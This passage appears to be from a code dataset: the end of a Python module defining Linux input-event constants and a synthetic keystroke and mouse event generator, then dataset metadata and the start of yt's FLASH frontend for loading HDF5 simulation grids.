KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
KEY_103RD = 84
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_KPCOMMA = 121
KEY_HANGUEL = 122
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128
KEY_AGAIN = 129
KEY_PROPS = 130
KEY_UNDO = 131
KEY_FRONT = 132
KEY_COPY = 133
KEY_OPEN = 134
KEY_PASTE = 135
KEY_FIND = 136
KEY_CUT = 137
KEY_HELP = 138
KEY_MENU = 139
KEY_CALC = 140
KEY_SETUP = 141
KEY_SLEEP = 142
KEY_WAKEUP = 143
KEY_FILE = 144
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150
KEY_MSDOS = 151
KEY_COFFEE = 152
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156
KEY_COMPUTER = 157
KEY_BACK = 158
KEY_FORWARD = 159
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169
KEY_ISO = 170
KEY_CONFIG = 171
KEY_HOMEPAGE = 172
KEY_REFRESH = 173
KEY_EXIT = 174
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_SUSPEND = 205
KEY_CLOSE = 206
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_SWITCHVIDEOMODE = 227
KEY_KBDILLUMTOGGLE = 228
KEY_KBDILLUMDOWN = 229
KEY_KBDILLUMUP = 230
KEY_SEND = 231
KEY_REPLY = 232
KEY_FORWARDMAIL = 233
KEY_SAVE = 234
KEY_DOCUMENTS = 235
KEY_BATTERY = 236
KEY_UNKNOWN = 240
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178
KEY_TV = 0x179
KEY_TV2 = 0x17a
KEY_VCR = 0x17b
KEY_VCR2 = 0x17c
KEY_SAT = 0x17d
KEY_SAT2 = 0x17e
KEY_CD = 0x17f
KEY_TAPE = 0x180
KEY_RADIO = 0x181
KEY_TUNER = 0x182
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192
KEY_CHANNELDOWN = 0x193
KEY_FIRST = 0x194
KEY_LAST = 0x195
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
KEY_MAX = 0x1ff
# * Relative axes
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
# * Absolute axes
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
ABS_MAX = 0x3f
# * Switch events
SW_LID = 0x00 # /* set = lid shut */
SW_TABLET_MODE = 0x01 # /* set = tablet mode */
SW_HEADPHONE_INSERT = 0x02 # /* set = inserted */
SW_MAX = 0x0f
# * Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
# * LEDs
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
# * Autorepeat values
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
# * Sounds
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
# * IDs.
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
BUS_GSC = 0x1A
# Values describing the status of an effect
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
_VALUEMAP = {}
for name, value in list(globals().items()):
if name.startswith("KEY_"):
shortname = name[4:]
_VALUEMAP[shortname] = value
del name, value
_LETTERS = {}
for c in ascii.lowercase:
val = globals()["KEY_%s" % c.upper()]
_LETTERS[c] = val
del c
_DIGITS = {}
for c in ascii.digits:
val = globals()["KEY_%s" % c]
_DIGITS[c] = val
del c
# ascii codes that result from modifiers
# TODO add more ISO-8859-1 symbols
_KEYMAP = { # This reflects a en_US keyboard mapping.
"'": KEY_APOSTROPHE,
',': KEY_COMMA,
'-': KEY_MINUS,
'.': KEY_DOT,
'/': KEY_SLASH,
';': KEY_SEMICOLON,
'=': KEY_EQUAL,
'[': KEY_LEFTBRACE,
']': KEY_RIGHTBRACE,
# '\\': KEY_BACKSLASH, # handled specially, since it is an escape
'`': KEY_GRAVE,
'!': SHIFT | KEY_1,
'"': SHIFT | KEY_APOSTROPHE,
'#': SHIFT | KEY_3,
'$': SHIFT | KEY_4,
'%': SHIFT | KEY_5,
'&': SHIFT | KEY_7,
'(': SHIFT | KEY_9,
')': SHIFT | KEY_0,
'*': SHIFT | KEY_8,
'+': SHIFT | KEY_EQUAL,
':': SHIFT | KEY_SEMICOLON,
'<': SHIFT | KEY_COMMA,
'>': SHIFT | KEY_DOT,
'?': SHIFT | KEY_SLASH,
'@': SHIFT | KEY_2,
'^': SHIFT | KEY_6,
'_': SHIFT | KEY_MINUS,
'{': SHIFT | KEY_LEFTBRACE,
'|': SHIFT | KEY_BACKSLASH,
'}': SHIFT | KEY_RIGHTBRACE,
'~': SHIFT | KEY_GRAVE,
'¥': SHIFT | ALT | KEY_5,
'£': SHIFT | ALT | KEY_3,
}
class RelativeMotionGenerator(object):
def __init__(self, device):
self._device = device # EventDevice handler (only uses write() method).
def MoveUp(self, ticks=1):
self._device.write(EV_REL, REL_Y, -ticks)
self._device.write(EV_SYN, 0, 0)
def MoveDown(self, ticks=1):
self._device.write(EV_REL, REL_Y, ticks)
self._device.write(EV_SYN, 0, 0)
def MoveLeft(self, ticks=1):
self._device.write(EV_REL, REL_X, -ticks)
self._device.write(EV_SYN, 0, 0)
def MoveRight(self, ticks=1):
self._device.write(EV_REL, REL_X, ticks)
self._device.write(EV_SYN, 0, 0)
class AbsoluteMotionGenerator(object):
def __init__(self, device):
self._device = device # EventDevice handler
def MoveTo(self, x, y):
self._device.write(EV_ABS, ABS_X, x)
self._device.write(EV_ABS, ABS_Y, y)
class KeyEventGenerator(object):
"""ASCII in, events out. Call an instance with a string."""
def __init__(self, device, keymap=_KEYMAP):
self._device = device # EventDevice handler (only uses write() method).
self._symbolmapping = keymap
self._init(keymap)
self.reset()
def reset(self):
self._fsm.reset()
self._ctrl = 0 # %C
self._shift = 0 # %S
self._alt = 0 # %A
self._meta = 0 # %M
self._compose = 0 # %O
def __call__(self, text):
for c in text:
self._fsm.process(c)
def _init(self, keymap):
keysyms = "".join(list(keymap.keys()))
f = FSM(0)
f.add_default_transition(self._error, 0)
# key code names are in angle brackets
f.add_transition_list(ascii.lowercase, 0, self._lower, 0)
f.add_transition_list(ascii.uppercase, 0, self._upper, 0)
f.add_transition_list(ascii.digits, 0, self._digit, 0)
f.add_transition_list(keysyms, 0, self._symbols, 0)
f.add_transition_list(ascii.control, 0, self._control, 0)
f.add_transition(" ", 0, self._space, 0)
# Any key name may use the "<NAME>" syntax (without the "KEY_")
f.add_transition('<', 0, self._startkeycode, 2)
f.add_transition_list(ascii.uppercase, 2, self._keyname, 2)
f.add_transition('>', 2, self._keycode, 0)
# slashes escape any special character.
f.add_transition("\\", 0, None, 1)
f.add_transition("\\", 1, self._backslash, 0)
f.add_transition_list("tnrbe", 1, self._specials, 0)
f.add_transition_list(keysyms, 1, self._symbols, 0)
# percent signals meta transitions.
f.add_transition("%", 0, None, 3)
f.add_transition("%", 3, self._symbols, 0)
f.add_transition_list("CcSsAaMmOo", 3, self._stickies, 0)
self._fsm = f
def _error(self, input_symbol, fsm):
msg = 'Error: symbol: %s, state: %s' % (input_symbol, fsm.current_state)
fsm.reset()
raise ValueError(msg)
def _startkeycode(self, c, fsm):
fsm.keyname = ""
def _keyname(self, c, fsm):
fsm.keyname += c
def _presskey(self, val):
self._device.write(EV_KEY, val, 1)
self._device.write(EV_KEY, val, 0)
def _keycode(self, c, fsm):
val = _VALUEMAP[fsm.keyname]
self._presskey(val)
scheduler.sleep(0.1)
def _lower(self, c, fsm):
val = _LETTERS[c]
self._presskey(val)
scheduler.sleep(0.1)
def _upper(self, c, fsm):
val = _LETTERS[c.lower()]
self._device.write(EV_KEY, KEY_LEFTSHIFT, 1)
self._presskey(val)
self._device.write(EV_KEY, KEY_LEFTSHIFT, 0)
scheduler.sleep(0.1)
def _digit(self, c, fsm):
val = _DIGITS[c]
self._presskey(val)
scheduler.sleep(0.1)
def _backslash(self, c, fsm):
self._presskey(KEY_BACKSLASH)
scheduler.sleep(0.1)
def _symbols(self, c, fsm):
d = self._device
val = self._symbolmapping[c]
code = val & 0x1ff
shifted = val & SHIFT
alt = val & ALT
meta = val & META
compose = val & COMPOSE
if compose:
d.write(EV_KEY, KEY_COMPOSE, 1)
if shifted:
d.write(EV_KEY, KEY_LEFTSHIFT, 1)
if alt:
d.write(EV_KEY, KEY_LEFTALT, 1)
if meta:
d.write(EV_KEY, KEY_LEFTMETA, 1)
self._presskey(code)
if meta:
d.write(EV_KEY, KEY_LEFTMETA, 0)
if alt:
d.write(EV_KEY, KEY_LEFTALT, 0)
if shifted:
d.write(EV_KEY, KEY_LEFTSHIFT, 0)
if compose:
d.write(EV_KEY, KEY_COMPOSE, 0)
scheduler.sleep(0.1)
def _specials(self, c, fsm):
if c == "t":
self._device.write(EV_KEY, KEY_TAB, 0)
elif c == "n":
self._device.write(EV_KEY, KEY_ENTER, 0)
elif c == "r":
self._device.write(EV_KEY, KEY_KPENTER, 0)
elif c == "b":
self._device.write(EV_KEY, KEY_BACKSPACE, 0)
elif c == "e":
self._device.write(EV_KEY, KEY_ESC, 0)
scheduler.sleep(0.1)
def _control(self, c, fsm):
val = _LETTERS[chr(ord(c) | 0x60)]
self._device.write(EV_KEY, KEY_LEFTCTRL, 1)
self._presskey(val)
self._device.write(EV_KEY, KEY_LEFTCTRL, 0)
scheduler.sleep(0.1)
def _space(self, c, fsm):
self._presskey(KEY_SPACE)
scheduler.sleep(0.1)
# "sticky" modifiers. Explicitly turned on and off using a % prefix.
def _stickies(self, c, fsm):
if c == "S" and not self._shift:
self._shift = 1
self._device.write(EV_KEY, KEY_LEFTSHIFT, 1)
elif c == "s" and self._shift:
self._shift = 0
self._device.write(EV_KEY, KEY_LEFTSHIFT, 0)
elif c == "C" and not self._ctrl:
self._ctrl = 1
self._device.write(EV_KEY, KEY_LEFTCTRL, 1)
elif c == "c" and self._ctrl:
self._shift = 0
self._device.write(EV_KEY, KEY_LEFTCTRL, 0)
elif c == "A" and not self._alt:
self._alt = 1
self._device.write(EV_KEY, KEY_LEFTALT, 1)
elif c == "a" and self._alt:
self._alt = 0
self._device.write(EV_KEY, KEY_LEFTALT, 0)
elif c == "M" and not self._meta:
self._meta = 1
self._device.write(EV_KEY, KEY_LEFTMETA, 1)
elif c == "m" and self._meta:
self._meta = 0
self._device.write(EV_KEY, KEY_LEFTMETA, 0)
elif c == "O" and not self._compose:
self._compose = 1
self._device.write(EV_KEY, KEY_COMPOSE, 1)
elif c == "o" and self._compose:
self._compose = 0
self._device.write(EV_KEY, KEY_COMPOSE, 0)
scheduler.sleep(0.1)
# run module as root like this:
# python -i event.py
if __name__ == "__main__":
from pycopia.OS import Input
class MockDevice(object):
def write(self, evtype, code, value):
print(("%s %s %s" % (evtype, code, value)))
def close(self):
pass
#fo = MockDevice()
fo = Input.EventDevice()
fo.find(name="keyboard")
g = KeyEventGenerator(fo)
scheduler.sleep(2)
expected = (ascii.lowercase + "\n" + ascii.uppercase + "\n" + ascii.digits + "\n" +
r"""!"#$&'()*+,-./:;<=>?@[\]^_`{|}~""" + "\n" + "ab%c\tDEF\tghi%\n" )
g('sent = """')
g(ascii.lowercase)
g("\n")
g(ascii.uppercase)
g("\n")
g(ascii.digits)
g("\n")
# You have to slash escape the "<" and \ itself.
g( r"""!"#$&'()*+,-./:;\<=>?@[\\]^_`{|}~""" )
g("\n")
g("ab\%c<TAB>%Sdef%s%Ci%cghi%%" )
g("\n")
g('"""\n')
g('sent == expected\n')
fo.close()
| 20.897059
| 87
| 0.660153
|
9243936cf817ba3cd57272a64abf95c98d36356e
| 20,689
|
py
|
Python
|
yt/frontends/flash/data_structures.py
|
Xarthisius/yt
|
321643c3abff64a6f132d98d0747f3558f7552a3
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
yt/frontends/flash/data_structures.py
|
Xarthisius/yt
|
321643c3abff64a6f132d98d0747f3558f7552a3
|
[
"BSD-3-Clause-Clear"
] | 31
|
2017-04-19T21:07:18.000Z
|
2017-04-20T01:08:43.000Z
|
yt/frontends/flash/data_structures.py
|
Xarthisius/yt
|
321643c3abff64a6f132d98d0747f3558f7552a3
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
import os
import weakref
import numpy as np
from yt.data_objects.index_subobjects.grid_patch import AMRGridPatch
from yt.data_objects.static_output import Dataset, ParticleFile, validate_index_order
from yt.funcs import mylog, setdefaultattr
from yt.geometry.grid_geometry_handler import GridIndex
from yt.geometry.particle_geometry_handler import ParticleIndex
from yt.utilities.file_handler import HDF5FileHandler, warn_h5py
from yt.utilities.physical_ratios import cm_per_mpc
from .fields import FLASHFieldInfo
class FLASHGrid(AMRGridPatch):
_id_offset = 1
# __slots__ = ["_level_id", "stop_index"]
def __init__(self, id, index, level):
AMRGridPatch.__init__(self, id, filename=index.index_filename, index=index)
self.Parent = None
self.Children = []
self.Level = level
def __repr__(self):
return "FLASHGrid_%04i (%s)" % (self.id, self.ActiveDimensions)
class FLASHHierarchy(GridIndex):
grid = FLASHGrid
_preload_implemented = True
def __init__(self, ds, dataset_type="flash_hdf5"):
self.dataset_type = dataset_type
self.field_indexes = {}
self.dataset = weakref.proxy(ds)
# for now, the index file is the dataset!
self.index_filename = self.dataset.parameter_filename
self.directory = os.path.dirname(self.index_filename)
self._handle = ds._handle
self._particle_handle = ds._particle_handle
self.float_type = np.float64
GridIndex.__init__(self, ds, dataset_type)
def _initialize_data_storage(self):
pass
def _detect_output_fields(self):
self.field_list = [
("flash", s.decode("ascii", "ignore"))
for s in self._handle["/unknown names"][:].flat
]
if "/particle names" in self._particle_handle:
self.field_list += [
("io", "particle_" + s[0].decode("ascii", "ignore").strip())
for s in self._particle_handle["/particle names"][:]
]
def _count_grids(self):
try:
self.num_grids = self.dataset._find_parameter(
"integer", "globalnumblocks", True
)
except KeyError:
try:
self.num_grids = self._handle["simulation parameters"]["total blocks"][
0
]
except KeyError:
self.num_grids = self._handle["/simulation parameters"][0][0]
def _parse_index(self):
f = self._handle # shortcut
ds = self.dataset # shortcut
f_part = self._particle_handle # shortcut
# Initialize to the domain left / domain right
ND = self.dataset.dimensionality
DLE = self.dataset.domain_left_edge
DRE = self.dataset.domain_right_edge
for i in range(3):
self.grid_left_edge[:, i] = DLE[i]
self.grid_right_edge[:, i] = DRE[i]
# We only go up to ND for 2D datasets
self.grid_left_edge[:, :ND] = f["/bounding box"][:, :ND, 0]
self.grid_right_edge[:, :ND] = f["/bounding box"][:, :ND, 1]
# Move this to the parameter file
try:
nxb = ds.parameters["nxb"]
nyb = ds.parameters["nyb"]
nzb = ds.parameters["nzb"]
except KeyError:
nxb, nyb, nzb = (
int(f["/simulation parameters"][f"n{ax}b"]) for ax in "xyz"
)
self.grid_dimensions[:] *= (nxb, nyb, nzb)
try:
self.grid_particle_count[:] = f_part["/localnp"][:][:, None]
except KeyError:
self.grid_particle_count[:] = 0.0
self._particle_indices = np.zeros(self.num_grids + 1, dtype="int64")
if self.num_grids > 1:
np.add.accumulate(
self.grid_particle_count.squeeze(), out=self._particle_indices[1:]
)
else:
self._particle_indices[1] = self.grid_particle_count.squeeze()
# This will become redundant, as _prepare_grid will reset it to its
# current value. Note that FLASH uses 1-based indexing for refinement
# levels, but we do not, so we reduce the level by 1.
self.grid_levels.flat[:] = f["/refine level"][:][:] - 1
self.grids = np.empty(self.num_grids, dtype="object")
for i in range(self.num_grids):
self.grids[i] = self.grid(i + 1, self, self.grid_levels[i, 0])
# This is a possibly slow and verbose fix, and should be re-examined!
rdx = self.dataset.domain_width / self.dataset.domain_dimensions
nlevels = self.grid_levels.max()
dxs = np.ones((nlevels + 1, 3), dtype="float64")
for i in range(nlevels + 1):
dxs[i, :ND] = rdx[:ND] / self.dataset.refine_by ** i
if ND < 3:
dxs[:, ND:] = rdx[ND:]
# Because we don't care about units, we're going to operate on views.
gle = self.grid_left_edge.ndarray_view()
gre = self.grid_right_edge.ndarray_view()
geom = self.dataset.geometry
if geom != "cartesian" and ND < 3:
if geom == "spherical" and ND < 2:
gle[:, 1] = 0.0
gre[:, 1] = np.pi
gle[:, 2] = 0.0
gre[:, 2] = 2.0 * np.pi
return
def _populate_grid_objects(self):
ii = np.argsort(self.grid_levels.flat)
gid = self._handle["/gid"][:]
first_ind = -(self.dataset.refine_by ** self.dataset.dimensionality)
for g in self.grids[ii].flat:
gi = g.id - g._id_offset
# FLASH uses 1-indexed group info
g.Children = [self.grids[i - 1] for i in gid[gi, first_ind:] if i > -1]
for g1 in g.Children:
g1.Parent = g
g._prepare_grid()
g._setup_dx()
if self.dataset.dimensionality < 3:
DD = self.dataset.domain_right_edge[2] - self.dataset.domain_left_edge[2]
for g in self.grids:
g.dds[2] = DD
if self.dataset.dimensionality < 2:
DD = self.dataset.domain_right_edge[1] - self.dataset.domain_left_edge[1]
for g in self.grids:
g.dds[1] = DD
self.max_level = self.grid_levels.max()
class FLASHDataset(Dataset):
_index_class = FLASHHierarchy
_field_info_class = FLASHFieldInfo
_handle = None
def __init__(
self,
filename,
dataset_type="flash_hdf5",
storage_filename=None,
particle_filename=None,
units_override=None,
unit_system="cgs",
default_species_fields=None,
):
self.fluid_types += ("flash",)
if self._handle is not None:
return
self._handle = HDF5FileHandler(filename)
self.particle_filename = particle_filename
if self.particle_filename is None:
# try to guess the particle filename
try:
self._particle_handle = HDF5FileHandler(
filename.replace("plt_cnt", "part")
)
self.particle_filename = filename.replace("plt_cnt", "part")
mylog.info(
"Particle file found: %s", self.particle_filename.split("/")[-1]
)
except OSError:
self._particle_handle = self._handle
else:
# particle_filename is specified by user
self._particle_handle = HDF5FileHandler(self.particle_filename)
# Check if the particle file has the same time
if self._particle_handle != self._handle:
part_time = self._particle_handle.handle.get("real scalars")[0][1]
plot_time = self._handle.handle.get("real scalars")[0][1]
if not np.isclose(part_time, plot_time):
self._particle_handle = self._handle
mylog.warning(
"%s and %s are not at the same time. "
"This particle file will not be used.",
self.particle_filename,
filename,
)
# These should be explicitly obtained from the file, but for now that
# will wait until a reorganization of the source tree and better
# generalization.
self.refine_by = 2
Dataset.__init__(
self,
filename,
dataset_type,
units_override=units_override,
unit_system=unit_system,
default_species_fields=default_species_fields,
)
self.storage_filename = storage_filename
self.parameters["HydroMethod"] = "flash" # always PPM DE
self.parameters["Time"] = 1.0 # default unit is 1...
def _set_code_unit_attributes(self):
if "unitsystem" in self.parameters:
# Some versions of FLASH inject quotes in the runtime parameters
# See issue #1721
us = self["unitsystem"].replace("'", "").replace('"', "").lower()
if us == "cgs":
b_factor = 1.0
elif us == "si":
b_factor = np.sqrt(4 * np.pi / 1e7)
elif us == "none":
b_factor = np.sqrt(4 * np.pi)
else:
raise RuntimeError(
"Runtime parameter unitsystem with "
"value %s is unrecognized" % self["unitsystem"]
)
else:
b_factor = 1.0
if self.cosmological_simulation == 1:
length_factor = 1.0 / (1.0 + self.current_redshift)
temperature_factor = 1.0 / (1.0 + self.current_redshift) ** 2
else:
length_factor = 1.0
temperature_factor = 1.0
setdefaultattr(self, "magnetic_unit", self.quan(b_factor, "gauss"))
setdefaultattr(self, "length_unit", self.quan(length_factor, "cm"))
setdefaultattr(self, "mass_unit", self.quan(1.0, "g"))
setdefaultattr(self, "time_unit", self.quan(1.0, "s"))
setdefaultattr(self, "velocity_unit", self.quan(1.0, "cm/s"))
setdefaultattr(self, "temperature_unit", self.quan(temperature_factor, "K"))
def set_code_units(self):
super().set_code_units()
def _find_parameter(self, ptype, pname, scalar=False):
nn = "/{} {}".format(
ptype, {False: "runtime parameters", True: "scalars"}[scalar]
)
if nn not in self._handle:
raise KeyError(nn)
for tpname, pval in zip(
self._handle[nn][:, "name"], self._handle[nn][:, "value"]
):
if tpname.decode("ascii", "ignore").strip() == pname:
if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
if ptype == "string":
return pval.strip()
else:
return pval
raise KeyError(pname)
def _parse_parameter_file(self):
if "file format version" in self._handle:
self._flash_version = int(self._handle["file format version"][:])
elif "sim info" in self._handle:
self._flash_version = int(
self._handle["sim info"][:]["file format version"]
)
else:
raise RuntimeError("Can't figure out FLASH file version.")
# First we load all of the parameters
hns = ["simulation parameters"]
# note the ordering here is important: runtime parameters should
# overwrite scalars with the same name.
for ptype in ["scalars", "runtime parameters"]:
for vtype in ["integer", "real", "logical", "string"]:
hns.append(f"{vtype} {ptype}")
if self._flash_version > 7:
for hn in hns:
if hn not in self._handle:
continue
for varname, val in zip(
self._handle[hn][:, "name"], self._handle[hn][:, "value"]
):
vn = varname.strip()
if hn.startswith("string"):
pval = val.strip()
else:
pval = val
if vn in self.parameters and self.parameters[vn] != pval:
mylog.info(
"%s %s overwrites a simulation scalar of the same name",
hn[:-1],
vn,
)
if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
self.parameters[vn.decode("ascii", "ignore")] = pval
if self._flash_version == 7:
for hn in hns:
if hn not in self._handle:
continue
if hn == "simulation parameters":
zipover = (
(name, self._handle[hn][name][0])
for name in self._handle[hn].dtype.names
)
else:
zipover = zip(
self._handle[hn][:, "name"], self._handle[hn][:, "value"]
)
for varname, val in zipover:
vn = varname.strip()
if hasattr(vn, "decode"):
vn = vn.decode("ascii", "ignore")
if hn.startswith("string"):
pval = val.strip()
else:
pval = val
if vn in self.parameters and self.parameters[vn] != pval:
mylog.info(
"%s %s overwrites a simulation scalar of the same name",
hn[:-1],
vn,
)
